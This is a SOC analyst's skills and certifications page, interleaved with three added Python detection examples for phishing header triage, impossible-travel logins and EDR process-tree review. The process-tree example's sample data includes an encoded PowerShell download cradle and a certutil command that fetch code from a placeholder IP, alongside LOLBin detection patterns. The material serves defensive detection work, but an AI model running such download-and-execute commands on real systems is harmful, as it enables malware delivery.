
Capabilities

Skills & Certifications

I specialize in security operations, incident response, threat hunting, and security monitoring across enterprise environments. My experience includes SIEM investigations, endpoint detection and response, email security analysis, vulnerability coordination, and clear communication with technical and non-technical stakeholders.

Core Security Operations Skills

Alert Triage & Investigation
Area: Security Operations | Level: Primary / Daily Use
Focus: Reviewing, prioritizing, and investigating security alerts across SIEM and EDR platforms to determine scope, severity, and required response actions.
Related Work: Alert queue management, false positive reduction, escalation workflows, shift handoff documentation.

Incident Response Coordination
Area: Security Operations | Level: Primary / Daily Use
Focus: Managing the incident lifecycle from initial detection through containment, eradication, recovery, and post-incident reporting.
Related Work: IR runbook execution, stakeholder notification, timeline construction, executive-level briefings.

Endpoint Detection & Response
Area: EDR | Level: Primary / Daily Use
Focus: Using CrowdStrike Falcon for endpoint visibility, threat hunting, process tree analysis, and response actions including host isolation and remediation.
Related Work: Suspicious process review, lateral movement detection, malware triage, CrowdStrike policy management.

Threat Hunting
Area: Security Operations | Level: Regular Use
Focus: Proactive hunting for indicators of compromise, attacker TTPs, and anomalous behavior patterns across endpoint and log data.
Related Work: IOC-based hunting, MITRE ATT&CK-aligned searches, behavioral baselining, hypothesis-driven investigations.

SIEM Search Development
Area: SIEM & Log Analysis | Level: Primary / Daily Use
Focus: Building and tuning detection logic, correlation searches, and investigation queries in Splunk to surface high-fidelity alerts and support active investigations.
Related Work: SPL query writing, dashboard creation, alert tuning, log source correlation.

Phishing & Email Security Analysis
Area: Email Security | Level: Primary / Daily Use
Focus: Investigating suspicious emails including header analysis, URL inspection, attachment review, and coordinating remediation across affected mailboxes.
Related Work: Header analysis, link detonation, mailbox sweeps, user notification, Sophos and O365 investigation.
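The header analysis described under Phishing & Email Security Analysis, as an added example (this is not code from the page or its author). The message is constructed for illustration: every domain uses the reserved .invalid TLD, the IPs come from documentation ranges, and the sender, recipient and URL are invented. The checks are the ones an analyst runs by hand on raw message source: read Authentication-Results for SPF, DKIM and DMARC, compare the From domain against Return-Path and Reply-To, walk the Received chain oldest hop first, and flag any link whose host is outside the claimed sender's domain.

```python
"""Phishing triage from raw message source: authentication results, sender
alignment, the Received chain and embedded URLs.

Added example, not code from the original page. The message below is
constructed; all domains, addresses and IPs are invented.
"""
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample: the display name claims the victim's own domain, but the
# envelope sender, Reply-To and landing URL all point elsewhere.
RAW_MESSAGE = b"""Return-Path: <bounce@mail-example-payroll.invalid>
Received: from mx.example.invalid (mx.example.invalid [203.0.113.10])
    by inbound.example-corp.invalid with ESMTPS id abc123
    for <jdoe@example-corp.invalid>; Mon, 3 Jun 2024 09:12:01 +0000
Received: from unknown (HELO payroll-update) (198.51.100.77)
    by mx.example.invalid; Mon, 3 Jun 2024 09:11:58 +0000
Authentication-Results: inbound.example-corp.invalid;
    spf=fail smtp.mailfrom=mail-example-payroll.invalid;
    dkim=none;
    dmarc=fail header.from=example-corp.invalid
From: "IT Helpdesk" <helpdesk@example-corp.invalid>
Reply-To: helpdesk-support@mail-example-payroll.invalid
To: jdoe@example-corp.invalid
Subject: Action required: password expires today
Content-Type: text/plain; charset=utf-8

Your password expires in 2 hours. Verify here:
http://example-corp-sso.invalid/login?u=jdoe
"""

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def domain_of(header_value):
    """Lower-cased domain of the first address in a header value, or ''."""
    return parseaddr(str(header_value or ""))[1].rpartition("@")[2].lower()


def auth_results(msg):
    """Parse Authentication-Results into {'spf': 'fail', 'dkim': 'none', ...}."""
    header = str(msg.get("Authentication-Results", ""))
    return {mech.lower(): res.lower() for mech, res in AUTH_RE.findall(header)}


def received_chain(msg):
    """First IPv4 seen in each Received header, oldest hop first
    (each relay prepends its header, so the top one is the newest)."""
    chain = []
    for hop in reversed(msg.get_all("Received", [])):
        m = IPV4_RE.search(str(hop))
        chain.append(m.group(1) if m else "unknown")
    return chain


def extract_urls(msg):
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    return sorted(set(URL_RE.findall(text)))


def same_org(host, domain):
    return host == domain or host.endswith("." + domain)


def triage(raw):
    """Return the sender domain, relay chain, URLs and a list of anomalies."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    auth = auth_results(msg)
    for mech in ("spf", "dkim", "dmarc"):
        if auth.get(mech) != "pass":
            findings.append(f"{mech} result is {auth.get(mech, 'missing')}")
    from_dom = domain_of(msg.get("From"))
    for name in ("Return-Path", "Reply-To"):
        dom = domain_of(msg.get(name))
        if dom and dom != from_dom:
            findings.append(f"{name} domain {dom} does not match From domain {from_dom}")
    urls = extract_urls(msg)
    for url in urls:
        host = re.sub(r"^https?://", "", url).split("/")[0].split(":")[0].lower()
        if not same_org(host, from_dom):
            findings.append(f"link host {host} is outside the From domain {from_dom}")
    return {"from": from_dom, "hops": received_chain(msg), "urls": urls,
            "findings": findings,
            "verdict": "suspicious" if findings else "no header anomalies"}


if __name__ == "__main__":
    for line in triage(RAW_MESSAGE)["findings"]:
        print(line)
```

Authentication-Results is only trustworthy when it was written by your own inbound gateway, so in practice the analyst checks the authserv-id at the start of the header (here inbound.example-corp.invalid) before relying on it.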

Account Compromise Investigation
Area: Identity & Access | Level: Regular Use
Focus: Investigating suspected account takeovers through authentication log review, MFA analysis, session activity, and lateral movement indicators.
Related Work: Failed login analysis, impossible travel detection, O365 audit log review, credential reset coordination.
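The failed-login analysis and impossible-travel detection listed under Account Compromise Investigation, and the kind of correlation logic the SIEM Search Development entry describes, as one added example (this is not code from the page or its author; it is the logic an analyst prototypes before expressing it as a Splunk correlation search). The events are constructed: users, source IPs (documentation ranges) and coordinates are invented, and the 900 km/h bound, the five-failure threshold and the ten-minute window are assumptions chosen for the example.

```python
"""Two authentication detections over constructed log events: a burst of
failures followed by a success, and impossible travel between logins.

Added example, not code from the original page. Users, IPs and locations
are invented; the thresholds are assumptions.
"""
import math
from collections import defaultdict, deque
from datetime import datetime, timedelta


def ev(clock, user, src_ip, geo, result, mfa=False):
    """Build one constructed auth event (all on one sample day, UTC)."""
    return {"time": datetime.fromisoformat(f"2024-06-03T{clock}"), "user": user,
            "src_ip": src_ip, "geo": geo, "result": result, "mfa": mfa}


NYC, KYIV, LONDON = (40.71, -74.01), (50.45, 30.52), (51.51, -0.13)

EVENTS = [
    ev("08:00:00", "alice", "203.0.113.5", NYC, "success", mfa=True),
    ev("08:45:00", "alice", "198.51.100.9", KYIV, "success", mfa=False),
    ev("09:00:00", "bob", "192.0.2.44", LONDON, "failure"),
    ev("09:00:30", "bob", "192.0.2.44", LONDON, "failure"),
    ev("09:01:00", "bob", "192.0.2.44", LONDON, "failure"),
    ev("09:01:30", "bob", "192.0.2.44", LONDON, "failure"),
    ev("09:02:00", "bob", "192.0.2.44", LONDON, "failure"),
    ev("09:02:30", "bob", "192.0.2.44", LONDON, "failure"),
    ev("09:03:00", "bob", "192.0.2.44", LONDON, "success", mfa=False),
    ev("10:00:00", "carol", "203.0.113.7", NYC, "failure"),
    ev("10:00:20", "carol", "203.0.113.7", NYC, "success", mfa=True),
]


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) points."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def impossible_travel(events, max_kmh=900.0):
    """Flag a user whose consecutive successful logins from different source
    IPs would require travelling faster than max_kmh (assumed airliner bound)."""
    alerts, last = [], {}
    successes = sorted((x for x in events if x["result"] == "success"),
                       key=lambda x: x["time"])
    for e in successes:
        prev = last.get(e["user"])
        if prev and prev["src_ip"] != e["src_ip"]:
            km = haversine_km(prev["geo"], e["geo"])
            hours = (e["time"] - prev["time"]).total_seconds() / 3600
            kmh = km / hours if hours > 0 else math.inf
            if kmh > max_kmh:
                alerts.append({"user": e["user"], "from_ip": prev["src_ip"],
                               "to_ip": e["src_ip"], "km": round(km),
                               "kmh": round(kmh), "mfa": e["mfa"]})
        last[e["user"]] = e
    return alerts


def failed_then_success(events, threshold=5, window=timedelta(minutes=10)):
    """Flag a success preceded by at least `threshold` failures for the same
    user and source within `window` (a guess that eventually worked)."""
    alerts, failures = [], defaultdict(deque)
    for e in sorted(events, key=lambda x: x["time"]):
        q = failures[(e["user"], e["src_ip"])]
        while q and e["time"] - q[0] > window:   # drop failures outside the window
            q.popleft()
        if e["result"] == "failure":
            q.append(e["time"])
        elif len(q) >= threshold:
            alerts.append({"user": e["user"], "src_ip": e["src_ip"],
                           "failures": len(q), "mfa": e["mfa"],
                           "span_s": int((e["time"] - q[0]).total_seconds())})
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in impossible_travel(EVENTS) + failed_then_success(EVENTS):
        print(alert)
```

The MFA field is carried on each alert because it changes the response: a success after a failure burst with no MFA challenge is a credential compromise until proven otherwise, while the same pattern with MFA satisfied is more often a user mistyping a rotated password. Source IP rather than geolocation is used to decide whether two logins count as a move, since coarse geo-IP data can place two addresses in the same city.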

Malware & Suspicious Process Review
Area: Endpoint | Level: Regular Use
Focus: Analyzing suspicious executables, scripts, and processes using static analysis, sandbox results, and EDR telemetry.
Related Work: PowerShell detection, living-off-the-land technique review, VirusTotal analysis, CrowdStrike process trees.
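The process-tree review, PowerShell detection and living-off-the-land check described under Malware & Suspicious Process Review, which is also the shape of the ATT&CK-aligned, hypothesis-driven hunt the Threat Hunting entry describes, as one added example (this is not code from the page, its author, or CrowdStrike). The events are constructed to look like EDR process telemetry: pids, parents, image names, the invoice.docm file name and the 198.51.100.77 URL are all invented. The encoded PowerShell is generated in the block itself so that the decode step is verifiable.

```python
"""Process-tree review of constructed EDR telemetry: rebuild parent/child
chains, decode -EncodedCommand PowerShell, and flag Office-spawned shells and
LOLBin download activity with MITRE ATT&CK technique IDs.

Added example, not code from the original page; events are invented.
"""
import base64
import re


def encode_ps(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(b64):
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")


PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.77/a.ps1')"

# Constructed events: pid, parent pid, image and command line as an EDR records them.
EVENTS = [
    {"pid": 1000, "ppid": 4, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": "outlook.exe", "cmdline": "outlook.exe"},
    {"pid": 3000, "ppid": 2000, "image": "winword.exe", "cmdline": 'winword.exe /n "invoice.docm"'},
    {"pid": 4000, "ppid": 3000, "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {encode_ps(PAYLOAD)}"},
    {"pid": 5000, "ppid": 4000, "image": "certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.77/b.exe C:\Users\Public\b.exe"},
    {"pid": 6000, "ppid": 1000, "image": "powershell.exe",          # benign admin script
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|"
                       r"Invoke-Expression|Net\.WebClient|FromBase64String", re.I)
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOLBINS = {  # image -> (suspicious argument pattern, ATT&CK technique)
    "certutil.exe": (re.compile(r"-urlcache|-decode", re.I), "T1105"),
    "mshta.exe": (re.compile(r"https?://|javascript:|vbscript:", re.I), "T1218.005"),
    "regsvr32.exe": (re.compile(r"/i:\S*https?://|scrobj\.dll", re.I), "T1218.010"),
    "rundll32.exe": (re.compile(r"javascript:|https?://", re.I), "T1218.011"),
}


def ancestry(events, pid):
    """Image names from the root ancestor down to pid (cycle-safe)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def render_tree(events, parent=None, depth=0):
    """Indented text rendering; roots are processes whose parent was not observed."""
    pids = {e["pid"] for e in events}
    lines = []
    for e in events:
        is_root = e["ppid"] not in pids
        if (parent is None and is_root) or e["ppid"] == parent:
            lines.append("  " * depth + f"{e['pid']} {e['image']}")
            lines.extend(render_tree(events, e["pid"], depth + 1))
    return lines


def analyze(events):
    """Return (pid, technique, detail) findings for suspicious processes."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, cmd = e["image"].lower(), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower() in OFFICE and img in SHELLS:
            findings.append((e["pid"], "T1204.002", f"{parent['image']} spawned {e['image']}"))
        if img in ("powershell.exe", "pwsh.exe"):
            m = ENC_RE.search(cmd)
            script = decode_ps(m.group(1)) if m else cmd   # inspect the decoded script, not the blob
            if m:
                findings.append((e["pid"], "T1027", "encoded command decodes to: " + script[:60]))
            if CRADLE_RE.search(script):
                findings.append((e["pid"], "T1059.001", "download cradle: " + script[:60]))
        rule = LOLBINS.get(img)
        if rule and rule[0].search(cmd):
            findings.append((e["pid"], rule[1], "LOLBin via " + " > ".join(ancestry(events, e["pid"]))))
    return findings


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS)))
    for pid, technique, detail in analyze(EVENTS):
        print(pid, technique, detail)
```

The decode step matters more than the keyword list: detections that only inspect the raw command line miss every cradle that arrives as -EncodedCommand, and the same goes for the other direction, where an unencoded script can still be obfuscated with string concatenation or backtick escapes that these patterns will not match. The ancestry string on each finding is what goes into the ticket, since "Outlook opened Word, Word spawned hidden PowerShell, PowerShell ran certutil" is the sentence that justifies host isolation to a non-technical reader.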

Vulnerability & Exposure Review
Area: Vulnerability Management | Level: Supporting Role
Focus: Reviewing vulnerability scan results, prioritizing exposures by risk and asset criticality, and coordinating remediation with system owners.
Related Work: Scan result triage, CVSS scoring, patch coordination, exposure reporting.

Executive & Agency-Level Reporting
Area: Communication | Level: Primary / Daily Use
Focus: Translating technical security findings into clear, actionable reporting for leadership, agency stakeholders, and non-technical audiences.
Related Work: Incident summaries, situational awareness briefs, SOP documentation, playbook authoring.

Certifications

CrowdStrike CCFA (CrowdStrike Certified Falcon Administrator), issued by CrowdStrike

CrowdStrike CCFR (CrowdStrike Certified Falcon Responder), issued by CrowdStrike

Splunk Core Certified Power User, issued by Splunk

Professional Skills

Executive-level briefing, incident documentation, cross-team coordination, analyst mentorship, playbook development, threat briefing, root cause analysis, process improvement.